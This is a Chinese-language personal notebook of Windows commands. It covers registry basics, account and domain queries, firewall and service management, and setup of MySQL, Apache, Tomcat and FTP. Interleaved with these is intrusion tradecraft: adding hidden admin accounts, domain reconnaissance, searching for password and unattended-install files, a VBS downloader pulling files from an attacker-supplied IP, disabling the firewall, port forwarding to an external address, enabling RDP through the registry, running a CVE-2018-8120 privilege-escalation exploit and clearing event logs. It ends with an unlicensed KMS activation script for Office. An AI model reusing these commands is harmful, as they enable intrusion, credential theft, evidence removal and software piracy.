Windows系统命令备份
注册表(Windows95以后Windows系统版本,windows server中regedit和regedit32合并为一个新的编辑器,名称仍然是regedit) HKEY_LOCAL_MACHINE HKLM 本机的软硬件信息 HKEY_CLASS_ROOT HKCR (1) 将文件扩展名与相关程序关联(2) 存储COM的注册信息(本质上是对HKLM/SOFTWARE/CLASS的一个映射) HKEY_USERS HKUSER 所有用户的首选项。 HKEY_CURRENT_USER HKCU 当前用户的配置():①桌面设置②环境变量③网路和打印机连接④其他定义用户操作环境的设置(本质上是对HKUSER中一个键的映射) HKEY_CURRENT_CONFIG HKCF 本机的详细硬件信息。另外两个键包含临时信息,这些信息常常会更改 HKEY_DYN_DATA 包含需要存储在注册表中的任何易失性数据 HKEY_PERFORMANCE_DATA 包含与运行应用程序的性能相关的信息 数据类型 含义 在regedit中的显示样式 REG_SZ 大致相当于字符创 文本 REG_DWORD 大致相当于unit 8 位十六进制 REG_BINARY 大致相当于字节数组、 十六进制 REG_MULTI 大致相当于多字符串值 含有多个文本值的字符串 注册表编辑器 regedit32 存在于windows NT 和windows 2000中,可查看regedit不能查看的安全信息(另外两个节点信息)
jdk14安装 - https://blog.csdn.net/bestsongs/article/details/105800251
查找文件
查找mysql.exe for /r c:\ %i in (mysql.exe) do echo %i
cmd命令-账号/域相关
1 net user 查看所有用户 2 whoami 当前用户:电脑名/用户名或域名/用户名 3 query user 查询所有登录用户/运行中用户-断开用户 4 net localgroup 查看所有用户组 5 net user ls abcd1234 /add 添加用户 6 net localgroup Administrators ls /add 添加用户到组 7 net user admin1 admin1 /add & net localgroup administrators admin1 /add 添加用户并添加用户到组 8 net user /domain 查看域用户 9 net view & net group "domain computers" /domain 查看当前域计算机列表 10 net view /domain 查看域个数 11 net view \\\\dc 查看dc域内共享文件 12 net group /domain 查看域组 13 net group "domain admins" /domain 查看域管理员 14 net group "domain controllers" /domain 查看域控制器 15 net config workstation 当前登录域 - 计算机名 - 用户名 16 net use \\\\域控(如pc.xx.com) password /user:xxx.com\username 登录域内主机,可访问资源 17 net localgroup administrators && whoami 查看当前用户是否属于管理组 18 whoami /all 查看用户信息、权限等 19 net share 共享目录 20 cmdkey /l 保存登录凭证 21 echo %logonserver% 查看当前域 22 set 环境变量 23 dsquery server 查看AD DC/LDS 24 dsquery user 查看域内所有用户 25 dsquery computer 查看域内所有计算机名称 26 dir /s *.exe 查看当前目录及子目录所有文件信息(文件个数、目录个数、文件大小、总文件个数、总文件大小) 27 echo %PROCESSOR_ARCHITECTURE% 识别系统体系结构 28 net user 用户名 查看用户详细信息 29 route print 查看路由表信息 30 netsh firewall show config 域 配置文件配置/配置文件的服务配置文件/配置文件的允许的程序配置/配置文件的端口配置/配置文件的ICMP配置/日志配置
cmd命令-文件/文件夹相关
1 文件操作 2 copy con ftp.bat 创建bat文件 3 copy con commandExec.vbs 创建vbs文件 "执行系统命令: 4 C:\Users\thel3l> copy con commandExec.vbs #创建VBS脚本文件 5 Call WScript.CreateObject(""Wscript.Shell"").Run(""cmd /K {command}"", 8, True) #VBS文件内容 6 C:\Users\thel3l> commandExec.vbs #执行脚本文件" 7 del 文件名 删除 8 dir /a -r-d /s /b 检查文件可写 9 where filename 查看文件是否存在 10 for /r c:\windows\temp\ %i in (.) do @echo %i 查看当前路径及子路径文件夹个数 11 12 敏感文件查询 13 dir /b/s password.txt 查看当前路径及子目录的password.txt文件 14 dir /s/a-d/b d:*.php 查找所有D盘php文件 15 dir /b/s config.* 16 findstr /si password *.xml *.ini *.txt 17 findstr /si login *.xml *.ini *.txt 18 C:\sysprep.inf "无人值守安装文件: 19 这些文件通常包含base64模式的密码信息。这类文件在一些大型企业网络或GHO系统中可以发现,文件通常的位置如下:" 20 C:\sysprep\sysprep.xml 21 C:\Windows\Panther\Unattend\Unattended.xml 22 C:\Windows\Panther\Unattended.xml
上传/下载
1 Bitsadmin 2 上传vbs脚本 " downloadfile.vbs 3 4 ' Set your settings 5 6 strFileURL = ""http://{YOUR_IP}/{FILE_NAME.EXT}"" 7 8 strHDLocation = ""c:\\{FILE_NAME.EXT}"" 9 10 ' Fetch the file 11 12 Set objXMLHTTP = CreateObject(""MSXML2.XMLHTTP"") 13 14 objXMLHTTP.open ""GET"", strFileURL, false 15 16 objXMLHTTP.send() 17 18 If objXMLHTTP.Status = 200 Then 19 20 Set objADOStream = CreateObject(""ADODB.Stream"") 21 22 objADOStream.Open 23 24 objADOStream.Type = 1 'adTypeBinary 25 26 objADOStream.Write objXMLHTTP.ResponseBody 27 28 objADOStream.Position = 0 'Set the stream position to the start 29 30 Set objFSO = Createobject(""Scripting.FileSystemObject"") 31 32 If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation 33 34 Set objFSO = Nothing 35 36 objADOStream.SaveToFile strHDLocation 37 38 objADOStream.Close 39 40 Set objADOStream = Nothing 41 42 End if 43 44 Set objXMLHTTP = Nothing 45 46 运行: 47 48 C:\Users\thel3l>cscript.exe downloadfile.vbs"
cmd命令 -1
1 cmd /c dir 执行完dir命令后关闭命令窗口。 2 cmd /k dir 执行完dir命令后不关闭命令窗口。 3 cmd /c start dir 会打开一个新窗口后执行dir指令,原窗口会关闭 4 cmd /k start dir 会打开一个新窗口后执行dir指令,原窗口不会关闭。 5 arp命令 6 -A 查看arp缓存信息(动态/静态连接到该台机器的机器IP和mac) 7 -s 捆绑IP/解决局域网IP盗用 8 ping命令 9 ping baidu.com >> 2.txt 输出ping结果到txt文件 10 /t 一直执行/手动中断 11 ipconfig命令 12 ipconfig 以太网适配器本地连接--连接特定DNS后缀/自动配置的IPV4/子网掩码/默认网关 13 ipconfig/all "Windows IP配置 --主机名/主DNS后缀/节点类型/IP路由已启用/WINS代理已启用/DNS后缀搜索列表 14 以太网适配器本地连接 -- 连接特定DNS后缀/描述/mac地址/DHCP启用状态/自动配置启用状态/自动配置IPV4地址/子网掩码/默认网关/TCPIP上的NetBIOS启用状态/获得租约时间/租约过期时间/DHCP服务器/DNS服务器" 15 netstat命令 16 netstat -s -p icmp 查看路由器和主机连接 /ICMP连接情况
windows用户
1 system 2 nt authority(内置的系统管理账户) 3 administrator 4 普通账户,某些功能的使用,软件的安装等会受限 5 来宾账户,权限和普通账户权限相仿 6 win7用户管理(查看用户/组/修改密码) 控制面板-》用户账户
普通用户提权
1 点击我的电脑,进入计算机系统的管理界面。 2 怎样设置win7系统普通用户权限为管理员权限 3 在计算机管理界面,点击用户和用户组。 4 点击用户后,查看所有的用户。 5 在所有的用户里,选择一个用户。 6 选择好用户后,双击选定用户进入属性界面。 7 在用户的属性界面,选择隶属按钮。 8 在隶属界面,点击添加按钮并输入管理组名称。 9 输入完成管理名称,点击确定按钮。 10 然后我们返回计算机管理界面,点击用户组查看计算机管理员账户。 11 点击计算机管理员账户,发现刚才选定的用户已经加入管理员组获得管理员权限。 12 计算机管理组名称比管理员名称多一个S。
防火墙相关-1
1 查看端口信息 netstat -ano | findstr "8080" 2 根据Pid查看进程名称 tasklist | findstr "5992" 3 根据Pid结束进程 taskkill /pid 1164 4 查看防火墙配置 netsh firewall show config 5 添加防火墙规则(开放3389端口访问) netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
防火墙相关-2
1 netsh firewall show state 防火墙状态/开放端口查询 2 netsh firewall set opmode mode=disable 关闭防火墙 3 DriverQuery 查看安装驱动(模块名/显示名称/驱动程序类型/链接日期) 4 wmic product list brief 查看安装程序及版本信息 5 type 1.txt 打开文件/相当于Linux中cat 6 wmic /output:D:/1.txt cpu get name 获取wmic执行结果如CPU信息写入txt文件 7 wmic /output:D:/1.txt service list brief 查看服务信息(ExitCode/Name/ProcessId/StartMode/State/Status) 8 wmic /output:2.txt process list brief 查看进程信息(HandleCount Name Priority ProcessId ThreadCount WorkingSetSize ) 9 wmic startup list brief 查看启动程序信息(Caption Command User ) 10 C:\Users\thel3l> wmic qfe get Caption,Description,HotFixID,InstalledOn 查看补丁信息(Caption Description HotFixID InstalledOn ) 11 C:\Users\thel3l> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx" 查看单个补丁信息 12 cls 清屏 13 reg 注册表操作
文件/文件夹相关
1 文件夹权限获取 文件夹属性-》安全-》高级—》所有者-》切换为想要的账号 2 一、强制删除文件或目录CMD命令: 3 rd/s/q 盘符:\某个文件夹 (强制删除文件文件夹和文件夹内所有文件) 4 del/f/s/q 盘符:\文件名 (强制删除文件,文件名必须加文件后缀名) 5 二、删除文件或目录BAT命令: 6 1、新建.BAT批处理文件输入如下命令,然后将要删除的文件拖放到批处理文件图标上即可删除。 7 DEL /F /A /Q 8 RD /S /Q 9 三、强制删除工具软件推荐: 10 1、绿鹰文件解锁删除器FileSuperDelete 11 2、PowerTool.exe 12 3、Unlocker 1.8.7
域相关
1 域管理工具:dsquery
连通性检测
1 icmp ping(查网速)/tracert(查问题) 2 DNS nslookup(linux dig) 3 http curl 4 tracert
日志相关
1 分析工具 LogParser
wevtutil命令
wevtutil gli "windows powershell" #获取单个日志类别的统计信息 wevtutil qe /f:text "windows powershell" #查看指定日志的具体内 wevtutil cl "windows powershell" #删除单个日志类别的所有信息
cmd命令
1 explorer 资源管理器 2 logoff 注销 3 tsshutdn 60倒计时关机 4 lusrmgr.msc 本地用户和组 5 oobe/msoobe /a 检测系统是否激活(XP) 6 notepad 记事本 7 cleanmgr 打开磁盘清理窗口 8 net start/stop 服务名 开启/关闭服务 9 dvdplay DVD播放器 10 charmap 字符映射表 11 calc 计算器 12 chkdsk.exe 磁盘碎片整理 13 devmgmt.msc 设备管理器 14 rononce -p 15s关机 15 rsop.msc 组策略结果集 16 winver windows版本 17 sfc /scannow 扫描错误并还原 18 net config server /hidden:yes / net config server /hidden:no 在网络邻居中隐藏计算机/取消隐藏 19 dxdiag 启动DirectX进行驱动检测 20 regedit 打开注册表 21 msconfig.exe 系统配置 22 perfmon.msc 性能监视器 23 taskmgr 任务管理器 24 wmimgmt.msc 打开windows管理体系结构(WMI) 25 write 写字板 26 mspaint 画图 27 magnify 放大镜 28 mmc 控制台 29 mobsync 同步中心 30 dcomcnfg 组件服务 31 narrator 讲述人 32 shrpubw 创建共享文件夹 33 secpol.msc 本地安全策略 34 syskey 启动加密 35 eventvwr 事件查看器 36 eudcedit 字符编辑程序 37 regsvr32 /u *.dll 停止dll文件运行 38 regsvr32 /u zipfldr.dll 取消zip支持 39 certmgr.msc 证书管理 40 cliconfg SQL Server客户端网络实用工具 41 osk 屏幕键盘 42 odbcad32 ODBC数据源管理器 43 iexpress 系统自带木马捆绑工具 44 utilman 辅助工具管理器
系统错误处理
1 6118 关闭防火墙/启动computer brower服务
服务相关
1 computer browser -》搜索网上邻居
安全认证相关
1 NTLM CVE-2019-1040 2 negotiate
敏感文件相关
1 登录密码 C:\windows\system32\config\SAM 2 修改/忘记登录密码 https://blog.51cto.com/pengge666/1892916
mysql
1 远程连接 2 mysql -h192.168.10.1 -uroot -proot
ftp命令
1 远程连接 2 ftp->open 10.1.1.1 3 dir 4 pwd 5 bin 6 put 7 get 8 mput *.txt 批量上传 9 mget * 批量下载(所有文件) 10 mget *.txt 批量下载 11 mkdir 12 rmdir 13 delete 14 mdelete *.txt 批量删除 15 mdelete * 16 bye
ftp命令2
open IP ftp连接
quit 退出
!dir 通过!执行shell命令如dir
navicat相关
卸载 - 控制面板/文件夹/注册表
端口/PID/进程相关
关闭端口
netsh advfirewall firewall add rule name = "Disable port 135 - TCP" dir = in action = block protocol = TCP localport = 135 netsh advfirewall firewall add rule name = "Disable port 135 - UDP" dir = in action = block protocol = UDP localport = 135
端口被占用
80端口被PID4 - net stop http sc config httpstart= disabled
端口相关工具 - tcping / TCP&UDP测试工具
bat命令
echo on 表示在此语句后所有运行的命令都显示命令行本身 echo off 表示在此语句后所有运行的命令都不显示命令行本身 @echo off 但它是加在每个命令行的最前面,表示运行时不显示这一行的命令行(只能影响当前行)。 call 调用另一个批处理文件(如果不用call而直接调用别的批处理文件,那么执行完那个批处理文件后将无法返回当前文件并执行当前文件的后续命令)。 pause 暂停有提示 pause>nul 暂停无提示 rem 注释 title BAT的标题 echo= 输出空格 color 字体颜色设置 mode con:cols=width lines=height 窗体大小(默认80 40) tree /f 树形结构显示目录及子目录
HackerBar破解
FF浏览器 安装2.1.3版本 https://github.com/Mr-xn/hackbar2.1.3 关闭插件自动更新
net
net user ------> 本机用户列表 net localgroup administrators ------> 本机管理员[通常含有域用户] net user /domain ------> 查询域用户 net group /domain ------> 查询域里面的工作组 net group "domain admins" /domain ------> 查询域管理员用户组 net localgroup administrators /domain ------> 登录本机的域管理员 net localgroup administrators workgroup\user001 /add ----->域用户添加到本机 net group "Domain controllers" -------> 查看域控制器(如果有多台) net view ------> 查询同一域内机器列表 net view /domain ------> 查询域列表 net view /domain:domainname
dsquery
dsquery computer domainroot -limit 65535 && net group "domain computers" /domain ------> 列出该域内所有机器名 dsquery user domainroot -limit 65535 && net user /domain------>列出该域内所有用户名 dsquery subnet ------>列出该域内网段划分 dsquery group && net group /domain ------>列出该域内分组 dsquery ou ------>列出该域内组织单位 dsquery server && net time /domain------>列出该域内域控制器
IIS服务器搭建
Win7下启用IIS7配置ASP运行环境的详细方法 " 1、IIS7 在安装了上述组件后,如此操作:控制面板-系统和安全-管理工具-Internet信息服务(IIS)管理工具,打开运行。 Win7下启用IIS7配置ASP.NET运行环境的详细方法 "4、控制面板 --> 管理工具 -->Internet 信息服务(IIS)管理器 程序中找到 打开 Internet 信息服务(IIS)管理器 后,在中间部分的下部,可以看到 身份验证 配置项,双击
Mysql安装
net stop/start mysql mysqld--initialize 初始化-需要清空data目录文件 sc delete mysql 服务删除 mysqld --install MySQL --defaults-file=“你配置文件的位置” 服务安装 mysqld --initialize-insecure --user=mysql (注意有空格) data目录创建 没有my.ini文件 D:\MySql\bin>sc delete MySql(最好去电脑的服务窗口看下,如果找不到MySql服务,说明已经已经删除成功。如果还能看到MySql服务,可以手动右击选择”停止“) 新建一个my.ini空白文件(basedir 和 datadir 根据实际MySql安装的位置进行修改。) "# For advice on how to change settings please see # http://dev.mysql.com/doc/refman/5.6/en/server-configuration-defaults.html # *** DO NOT EDIT THIS FILE. It's a template which will be copied to the # *** default location during install, and will be replaced if you # *** upgrade to a newer version of MySQL. [client] default-character-set = utf8mb4 [mysql] default-character-set = utf8mb4 [mysqld] character-set-client-handshake = FALSE character-set-server = utf8mb4 collation-server = utf8mb4_bin init_connect='SET NAMES utf8mb4' # Remove leading # and set to the amount of RAM for the most important data # cache in MySQL. Start at 70% of total RAM for dedicated server, else 10%. innodb_buffer_pool_size = 128M # Remove leading # to turn on a very important data integrity option: logging # changes to the binary log between backups. # log_bin # These are commonly set, remove the # and set as required. basedir = D:\MySQL datadir = D:\MySQL\data port = 3306 # server_id = ..... # Remove leading # to set options mainly useful for reporting servers. # The server defaults are faster for transactions and fast SELECTs. # Adjust sizes as needed, experiment to find the optimal values. join_buffer_size = 128M sort_buffer_size = 16M read_rnd_buffer_size = 16M sql_mode=NO_ENGINE_SUBSTITUTION,STRICT_TRANS_TABLES" 删除之前生成的data文件 D:\MySql\bin>mysqld --initialize-insecure --user=mysql 重新生成data文件 D:\MySql\bin>mysqld --install "MySql80" --defaults-file="d:/mysql/my.ini" 装MySql服务,同时设置绑定my.ini配置文件 net start mysql80 "cmd启动 如果不成功:可能是my.ini配置文件中的某些配置有问题。你可以修改ini文件内容,然后从头按步骤再试一遍。" D:\MySql\bin>mysql -u root -p ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY '你的密码'; "如果需要自定义配置,可以打开文件进行相应的配置设置,修改后重启服务即可。 如果修改后,重启服务报错,可能是:你修改的配置与服务初始化时的配置有冲突,这时只能从头开始,在初始化的时候绑定my.ini文件 。"
Apache
问题:
httpd.exe -w -n "apache2.4" -k start --分析问题原因
Windows 7 系统下安装 Apache 报 1053 错误 - "错误 1053: 服务没有及时响应启动或控制请求" 在 https://www.apachelounge.com/download/ 链接中找到 vc_redist_x64.exe 并下载 Windows不能在本地计算机启动Apache - 端口被占用
Tomcat安装
下载 http://archive.apache.org/dist/tomcat/tomcat-8/v8.5.31/src/ 选择zip
安装 安装前确保已经安装配置JDK。比如JAVA_HOME没配好是会一闪而过的。 解压 运行/bin/startup.bat 卸载 删除文件夹 注册表搜索tomcat删除 删除tomcat服务 sc delete xxx
FTP服务器搭建
计算机管理中创建ftp账号 Windows功能-》Internet信息服务-》FTP服务和FTP扩展勾选 ftp上传服务器 计算机管理-》服务和应用程序-》Internet信息服务-》网站-》右键选择添加ftp服务器 ftp下载服务器(上传下载使用不同端口) 根据端口访问上传和下载服务器 启动服务:Microsoft FTP Service
关闭 - Windows
控制面板-》启动或关闭Windows功能-》找到FTP服务器-》取消勾选
0x01 netsh命令之防火墙 0X01-1 Win2003 netsh firewall show state 查看系统防火墙状态 netsh firewall set opmode disable | netsh firewall get opmode disable 关闭防火墙 netsh firewall set opmode enable 开启防火墙 netsh firewall add portopening [tcp|udp|all] [Port] [name] 根据端口添加规则 netsh firewall delete portopening [tcp|udp|all] [Port] 根据端口删除规则 netsh firewall add allowedprogram [ProcessName] [name] enable 根据进程添加规则 netsh firewall delete allowedprogram [ProcessName] 根据进程删除规则 0X01-2 after Win2003 netsh firewall show config 查看防火墙配置 netsh advfirewall show allprofiles 查看防火墙状态 netsh advfirewall set allprofiles state off 关闭防火墙 netsh advfirewall set allprofiles state on 开启防火墙 netsh advfirewall reset 重置防火墙规则(重置刚装好系统时的状态) netsh advfirewall firewall add rule name=[name] dir=in action=allow protocol=tcp localport=[Port] 根据端口添加入栈规则 netsh advfirewall firewall delete rule name=[name] dir=in protocol=tcp localport=[Port] 根据端口删除入栈规则 netsh advfirewall firewall add rule name=[name] dir=out action=allow protocol=tcp localport=[Port] 根据端口添加出栈规则 netsh advfirewall firewall delete rule name=[name] dir=out protocol=tcp localport=[Port] 根据端口删除出栈规则 0X02 netsh命令之流量转发 netsh interface portproxy show all 查看所有转发规则 netsh interface portproxy add v4tov4 listenport=[Port1] connectaddress=IP connectport=[Port2] netsh interface portproxy delete v4tov4 listenport=Port 删除转发规则 netsh interface portproxy add v4tov4 listenaddress=172.17.17.116 listenport=3306 connectaddress=47.75.16.28 connectport=7001 Windows Server 2003 wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 Windows Serveer 2003 | Windows XP [Method-1] REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f [Method-2] REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Windows Server 2008 | Windows10 reg query "hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\RDP-Tcp" /v portnumber 查看远程连接端口 Win7 CVE-2018-8120.exe "REG ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f" Windows Server 2008 | Win10 设置远程桌面端口 reg add “HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /t REG_DWORD /v portnumber /d [Port] /f 查询并开启远程连接端口
https://bugs.hacking8.com/tiquan/?m=open3389 Windows Server 2008 & 2012打开3389: wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1 wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1 reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f Windows Server 2003 开启3389 wmic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
Office365激活脚本(保存为.cmd后缀格式)
1 @echo off 2 title Activate Office 365 ProPlus for FREE - MSGuides.com&cls&echo ============================================================================&echo #Project: Activating Microsoft software products for FREE without software&echo ============================================================================&echo.&echo #Supported products: Office 365 ProPlus (x86-x64)&echo.&echo.&(if exist "%ProgramFiles%\Microsoft Office\Office16\ospp.vbs" cd /d "%ProgramFiles%\Microsoft Office\Office16")&(if exist "%ProgramFiles(x86)%\Microsoft Office\Office16\ospp.vbs" cd /d "%ProgramFiles(x86)%\Microsoft Office\Office16")&(for /f %%x in ('dir /b ..\root\Licenses16\proplusvl_kms*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul)&(for /f %%x in ('dir /b ..\root\Licenses16\proplusvl_mak*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul)&echo.&echo ============================================================================&echo Activating your Office...&cscript //nologo ospp.vbs /unpkey:WFG99 >nul&cscript //nologo ospp.vbs /unpkey:DRTFM >nul&cscript //nologo ospp.vbs /unpkey:BTDRB >nul&cscript //nologo ospp.vbs /inpkey:XQNVK-8JYDB-WJ9W3-YJ8YR-WFG99 >nul&set i=1 3 :server 4 if %i%==1 set KMS_Sev=kms7.MSGuides.com 5 if %i%==2 set KMS_Sev=kms8.MSGuides.com 6 if %i%==3 set KMS_Sev=kms9.MSGuides.com 7 if %i%==4 goto notsupported 8 cscript //nologo ospp.vbs /sethst:%KMS_Sev% >nul&echo ============================================================================&echo.&echo. 9 cscript //nologo ospp.vbs /act | find /i "successful" && (echo.&echo ============================================================================&echo.&echo #My official blog: MSGuides.com&echo.&echo #How it works: bit.ly/kms-server&echo.&echo #Please feel free to contact me at msguides.com@gmail.com if you have any questions or concerns.&echo.&echo #Please consider supporting this project: donate.msguides.com&echo #Your support is helping me keep my servers running everyday!&echo.&echo ============================================================================&choice /n /c YN /m "Would you like to visit my blog [Y,N]?" & if errorlevel 2 exit) || (echo The connection to my KMS server failed! Trying to connect to another one... & echo Please wait... & echo. & echo. & set /a i+=1 & goto server) 10 explorer "http://MSGuides.com"&goto halt 11 :notsupported 12 echo.&echo ============================================================================&echo Sorry! Your version is not supported.&echo Please try installing the latest version here: bit.ly/odt2k16 13 :halt 14 pause
interzjmcrm.zj.chinamobile.com
